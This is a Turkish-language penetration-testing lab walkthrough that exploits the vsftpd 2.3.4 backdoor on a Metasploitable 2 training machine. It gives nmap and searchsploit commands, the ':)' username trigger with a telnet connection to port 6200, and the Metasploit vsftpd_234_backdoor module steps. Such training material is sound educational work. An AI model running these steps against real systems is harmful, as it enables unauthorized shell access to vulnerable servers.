IP adresi 100.100.200.7 olan Metasploitable 2, Nessus ile taratıldığında TCP 21. portta Vsftpd 2.3.4 uygulamasının hizmet verdiği görülmektedir. Bu sürümde VSFTPD indirme arşivine eklenen bir arka kapı bulumaktadır.
Sürüm bilgisi nmap aracı ile de tespit edilebilirdi.
nmap -sV -Pn -n 100.100.200.7 -p 21 –open
Vsftpd uygulamasının 2.3.4 sürüme ait zafiyet Nmap’in betikleri ile bulunabilir.
nmap 100.100.200.7 -p 21 –script vuln
Bunun yanında “searchsploit” aracı ile “exploit-db” üzerinde arama da gerçekleştirilebilir.
searchsploit vsftpd
VSFTPD 2.3.4 sürümünde bulunan zafiyet bir arka kapıdır. Eğer kullanıcı adı “:)” karakter çiftini içerirse, oturum açılabilmektedir. Örneğin kullanıcı adı “Merhaba:)” (veya “Mer:)haba”, “:)Merhaba”,…) parola da “Parola123” olarak denenirse oturum açılabilecektir. Ayrıca TCP/6200 portu arka kapı olarak açılacak ve kimlik doğrulaması olmadan oturum açılabilecektir.
USER Merhaba:)
PASSWORD Parola123telnet 100.100.200.7 6200
Bunun yanında otomatik olarak bu zafiyeti istismar etmek için Metaplosploit Framework içerisindeki vsftpd_234_backdoor istismar modülü kullanılabilir.
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir. Bu modül ile hedef işletim sisteminin TCP/6200 portuna erişim sağlandığı görülebilir.
set RHOST 100.100.200.7
run
Kaynak: